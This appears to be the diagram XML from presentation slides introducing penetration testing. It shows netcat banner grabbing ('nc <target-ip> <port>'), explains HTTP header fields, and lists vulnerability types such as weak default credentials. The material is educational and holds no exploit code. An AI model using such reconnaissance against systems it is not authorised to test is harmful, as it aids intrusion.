    <dgm:cxn modelId="{82C0C618-73F3-4F3A-BED6-A25FC5ECDB9B}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{16A0FE2A-5E7D-481C-8BA0-3EA62BB3D272}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0925A263-7B2F-4F9B-921C-F2A8D10CEACC}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{B211F55F-0C42-4F6F-AF65-8144B7BFF4CA}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{05D70D46-4DB2-4FAE-BBA4-496E422A0513}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{F6AE7433-5EEC-4378-A05D-F3A839F6AD8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8C8CE5-E4EA-4218-9977-2EF98B45D4DC}"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21459CFC-DA24-4AB9-9F7D-89A3BAB899DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>To grab the banner from a specific service :</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E25CBFA7-1532-4069-8CA2-9C51A6942698}" type="parTrans" cxnId="{D2CFC633-8470-4ABD-A7DC-848BA9C1F519}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3612F2A-AF9A-42CF-8CB8-19436F6FEA92}" type="sibTrans" cxnId="{D2CFC633-8470-4ABD-A7DC-848BA9C1F519}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44F5B0F7-3F69-42C5-B457-519F90D58621}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>nc &lt;target-ip&gt; &lt;port&gt;</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8BF4E80-777B-4DC9-BAF6-8625FBF303E7}" type="parTrans" cxnId="{B58EA7FE-E1D7-47B4-8487-2A85197FBCBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58867E44-B9E4-4643-BF8C-6CE267F99934}" type="sibTrans" cxnId="{B58EA7FE-E1D7-47B4-8487-2A85197FBCBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB6B32D2-115A-448B-B41C-CFB99CF99805}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>The output should be :</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88406C92-5CD8-457C-87B6-72DE40C266D8}" type="parTrans" cxnId="{8043B73B-223E-4E22-B9B6-6C71B0895894}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5C46BE5-44EC-4258-8C05-97B1FD91E6E0}" type="sibTrans" cxnId="{8043B73B-223E-4E22-B9B6-6C71B0895894}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACF0F9B8-E36E-44EA-8915-1893C9A8A585}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Date</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>: The current date and time.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F36F76C-861C-49FF-B95F-9273066E1D7B}" type="parTrans" cxnId="{AB09CB34-9C3D-4D78-A781-296CA5B0BDC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48452367-A353-4590-AD2B-34EB640D5724}" type="sibTrans" cxnId="{AB09CB34-9C3D-4D78-A781-296CA5B0BDC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45011C20-82A8-42AE-BA21-6BF4CDC12B50}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Server</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>: The server software and version</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73170CA3-F129-4523-9117-65E0F7CA5023}" type="parTrans" cxnId="{72E56284-253A-4B2B-8E9F-F0875ADE5BDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E98D7330-76AB-47FD-9782-26D3FF341673}" type="sibTrans" cxnId="{72E56284-253A-4B2B-8E9F-F0875ADE5BDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9041E6C3-D6E6-4847-9429-DCF3728D1D55}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Content-Type</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>: Information about the type of content being served.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A01ADCD-D19B-4C75-A4AE-35844B15FCC9}" type="parTrans" cxnId="{C06CFB3C-B173-4AE7-8327-AC60C46E9FA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23A78B2F-D483-4F83-BACE-CE8E849EBBAF}" type="sibTrans" cxnId="{C06CFB3C-B173-4AE7-8327-AC60C46E9FA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5044780E-2F2C-496B-BECA-8E68F5782001}" type="pres">
      <dgm:prSet presAssocID="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AEECAE1B-884F-4774-B933-5D47C3004D94}" type="pres">
      <dgm:prSet presAssocID="{21459CFC-DA24-4AB9-9F7D-89A3BAB899DC}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{96AA0972-6E3C-45BD-8C6D-4F4C9978E48B}" type="pres">
      <dgm:prSet presAssocID="{B3612F2A-AF9A-42CF-8CB8-19436F6FEA92}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F1EE9BCD-97C5-4784-8487-A01747CA2ACE}" type="pres">
      <dgm:prSet presAssocID="{44F5B0F7-3F69-42C5-B457-519F90D58621}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3B0B5F2-DE31-4833-964B-4F16BCD954F4}" type="pres">
      <dgm:prSet presAssocID="{58867E44-B9E4-4643-BF8C-6CE267F99934}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2BB1FDC-D044-4462-8067-995DF0E6DFED}" type="pres">
      <dgm:prSet presAssocID="{AB6B32D2-115A-448B-B41C-CFB99CF99805}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{81032588-36C2-4691-9357-AE649A0A680E}" type="pres">
      <dgm:prSet presAssocID="{B5C46BE5-44EC-4258-8C05-97B1FD91E6E0}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0CC8BE6-4EA5-4AF3-BBC1-1B6CF34BB096}" type="pres">
      <dgm:prSet presAssocID="{ACF0F9B8-E36E-44EA-8915-1893C9A8A585}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB0F5527-E37D-42F8-86F7-B1FDB0E86506}" type="pres">
      <dgm:prSet presAssocID="{48452367-A353-4590-AD2B-34EB640D5724}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{088FD0FD-CC52-435F-9C92-DC437C875497}" type="pres">
      <dgm:prSet presAssocID="{45011C20-82A8-42AE-BA21-6BF4CDC12B50}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2951FE59-54AF-4E1E-839A-30A4031024D5}" type="pres">
      <dgm:prSet presAssocID="{E98D7330-76AB-47FD-9782-26D3FF341673}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7568511-0FBA-4AE6-87F0-2C49B8F7E410}" type="pres">
      <dgm:prSet presAssocID="{9041E6C3-D6E6-4847-9429-DCF3728D1D55}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{D2CFC633-8470-4ABD-A7DC-848BA9C1F519}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{21459CFC-DA24-4AB9-9F7D-89A3BAB899DC}" srcOrd="0" destOrd="0" parTransId="{E25CBFA7-1532-4069-8CA2-9C51A6942698}" sibTransId="{B3612F2A-AF9A-42CF-8CB8-19436F6FEA92}"/>
    <dgm:cxn modelId="{AB09CB34-9C3D-4D78-A781-296CA5B0BDC0}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{ACF0F9B8-E36E-44EA-8915-1893C9A8A585}" srcOrd="3" destOrd="0" parTransId="{4F36F76C-861C-49FF-B95F-9273066E1D7B}" sibTransId="{48452367-A353-4590-AD2B-34EB640D5724}"/>
    <dgm:cxn modelId="{8043B73B-223E-4E22-B9B6-6C71B0895894}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{AB6B32D2-115A-448B-B41C-CFB99CF99805}" srcOrd="2" destOrd="0" parTransId="{88406C92-5CD8-457C-87B6-72DE40C266D8}" sibTransId="{B5C46BE5-44EC-4258-8C05-97B1FD91E6E0}"/>
    <dgm:cxn modelId="{C06CFB3C-B173-4AE7-8327-AC60C46E9FA7}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{9041E6C3-D6E6-4847-9429-DCF3728D1D55}" srcOrd="5" destOrd="0" parTransId="{7A01ADCD-D19B-4C75-A4AE-35844B15FCC9}" sibTransId="{23A78B2F-D483-4F83-BACE-CE8E849EBBAF}"/>
    <dgm:cxn modelId="{1D90F669-7900-40AC-BFBC-68CABBD0A972}" type="presOf" srcId="{44F5B0F7-3F69-42C5-B457-519F90D58621}" destId="{F1EE9BCD-97C5-4784-8487-A01747CA2ACE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{DEA95383-9658-4352-8F93-FCB0044B945C}" type="presOf" srcId="{21459CFC-DA24-4AB9-9F7D-89A3BAB899DC}" destId="{AEECAE1B-884F-4774-B933-5D47C3004D94}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{72E56284-253A-4B2B-8E9F-F0875ADE5BDB}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{45011C20-82A8-42AE-BA21-6BF4CDC12B50}" srcOrd="4" destOrd="0" parTransId="{73170CA3-F129-4523-9117-65E0F7CA5023}" sibTransId="{E98D7330-76AB-47FD-9782-26D3FF341673}"/>
    <dgm:cxn modelId="{DCE7A386-E15D-4FD7-A651-46CE58191BCB}" type="presOf" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{5044780E-2F2C-496B-BECA-8E68F5782001}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{CE5B11BA-4EF3-41DE-B34D-383B0B8307D9}" type="presOf" srcId="{ACF0F9B8-E36E-44EA-8915-1893C9A8A585}" destId="{C0CC8BE6-4EA5-4AF3-BBC1-1B6CF34BB096}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A4F561CA-1966-4BB1-9516-C2D7582A67E8}" type="presOf" srcId="{45011C20-82A8-42AE-BA21-6BF4CDC12B50}" destId="{088FD0FD-CC52-435F-9C92-DC437C875497}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A262CFF0-E951-4BAA-B29A-ED2A9B929EDA}" type="presOf" srcId="{AB6B32D2-115A-448B-B41C-CFB99CF99805}" destId="{C2BB1FDC-D044-4462-8067-995DF0E6DFED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B58EA7FE-E1D7-47B4-8487-2A85197FBCBF}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{44F5B0F7-3F69-42C5-B457-519F90D58621}" srcOrd="1" destOrd="0" parTransId="{B8BF4E80-777B-4DC9-BAF6-8625FBF303E7}" sibTransId="{58867E44-B9E4-4643-BF8C-6CE267F99934}"/>
    <dgm:cxn modelId="{C6983CFF-9E11-43E6-9C72-379ED41EC7C2}" type="presOf" srcId="{9041E6C3-D6E6-4847-9429-DCF3728D1D55}" destId="{F7568511-0FBA-4AE6-87F0-2C49B8F7E410}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{3C3B0C2B-B3F7-4F9B-B652-9C53BF512B73}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{AEECAE1B-884F-4774-B933-5D47C3004D94}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{80DEE7BB-6152-42AC-9329-99FB24D53DB7}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{96AA0972-6E3C-45BD-8C6D-4F4C9978E48B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{71D1A855-FFD3-4105-B215-AFBC3CA37B55}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{F1EE9BCD-97C5-4784-8487-A01747CA2ACE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4A07E9DD-82D8-4650-A676-F3142BF143E7}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{C3B0B5F2-DE31-4833-964B-4F16BCD954F4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8A47BCA0-D95F-420E-97EC-D12DEFE7BF61}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{C2BB1FDC-D044-4462-8067-995DF0E6DFED}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{55B35606-D627-43ED-8179-CFFEE7DE4276}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{81032588-36C2-4691-9357-AE649A0A680E}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F1ADDAED-E89A-49AD-A926-D5C4E5696618}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{C0CC8BE6-4EA5-4AF3-BBC1-1B6CF34BB096}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{21576533-B8D3-4310-8A60-02D4AF03717C}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{BB0F5527-E37D-42F8-86F7-B1FDB0E86506}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{3EBE032A-94A9-4FCE-998B-954A12F0F728}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{088FD0FD-CC52-435F-9C92-DC437C875497}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{AE93A397-E83B-4694-8575-8739BC702F91}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{2951FE59-54AF-4E1E-839A-30A4031024D5}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{20CEE6EC-3EA4-4024-83AD-7EE860167805}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{F7568511-0FBA-4AE6-87F0-2C49B8F7E410}"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FDF0B-6643-4627-9C4F-407B6B7004B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1225" y="126292"/>
          <a:ext cx="4301580" cy="273150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B8901D-01D5-442C-BBF3-ED6F538051F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="479178" y="580348"/>
          <a:ext cx="4301580" cy="273150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Knowing about vulnerabilities is essential for penetration testers, as they will often exploit these to assess security during engagements.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="559181" y="660351"/>
        <a:ext cx="4141574" cy="2571497"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{87A1B657-444F-437B-A7DB-2183CE8074A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5258712" y="126292"/>
          <a:ext cx="4301580" cy="273150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7EFF4-6D45-4449-8017-216DD6B9DE61}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5736666" y="580348"/>
          <a:ext cx="4301580" cy="2731503"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="lt2">
            <a:alpha val="90000"/>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Vulnerabilities play a critical role in an organization's vulnerability management, where the goal is to identify, prioritize, and mitigate potential threats.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5816669" y="660351"/>
        <a:ext cx="4141574" cy="25714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D6F6EC-D4B4-4EE3-9832-4387E440CBD6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4307"/>
          <a:ext cx="6364224" cy="91753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501616-B0C4-415D-B7AF-29F864105B68}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="277554" y="210753"/>
          <a:ext cx="504644" cy="5046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3E0191F-8FBF-4239-A8FA-9F4CD2D68705}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1059754" y="430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Operating System Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Often lead to privilege escalation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="4307"/>
        <a:ext cx="5304469" cy="917536"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BC8816F6-C443-4C38-8B2D-1A4C58BA2F4E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1151227"/>
          <a:ext cx="6364224" cy="91753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574396-6D6D-46A2-85D0-BD58C82E8386}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="277554" y="1357673"/>
          <a:ext cx="504644" cy="5046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C1F707-86AA-48F1-AA87-5B77320F775C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1059754" y="115122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Misconfiguration-Based Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Result from incorrect configuration, such as exposing sensitive data.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="1151227"/>
        <a:ext cx="5304469" cy="917536"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0041D5B-A451-4BE7-97ED-ECB827100573}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2298147"/>
          <a:ext cx="6364224" cy="91753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E1EAD-6482-4F32-BDAB-A2E0D9356CFF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="277554" y="2504593"/>
          <a:ext cx="504644" cy="5046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A52A9B-CCC7-496B-8D6B-8B0EAA4B3AD7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1059754" y="2298147"/>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Weak or Default Credentials</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Easily guessable login credentials like “admin/admin.”</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="2298147"/>
        <a:ext cx="5304469" cy="917536"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8429B3F8-0692-4580-AAAD-ACB10A105C3E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3445068"/>
          <a:ext cx="6364224" cy="91753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71A647-2598-4220-851B-58FCDFB51709}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="277554" y="3651513"/>
          <a:ext cx="504644" cy="5046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57FABA-4393-4E78-AC84-092FA64D5A16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1059754" y="344506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Application Logic Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Flaws in how an application operates, which can be exploited to bypass security.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="3445068"/>
        <a:ext cx="5304469" cy="917536"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{92C6FA6F-4A29-442D-B552-CD287699C562}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4591988"/>
          <a:ext cx="6364224" cy="91753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CD19B2-7CF6-41F0-BDCF-8B3E74F85A38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="277554" y="4798433"/>
          <a:ext cx="504644" cy="50464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6400EC-2719-40EB-94E6-DB42C7CE8C38}">
      <dsp:nvSpPr>
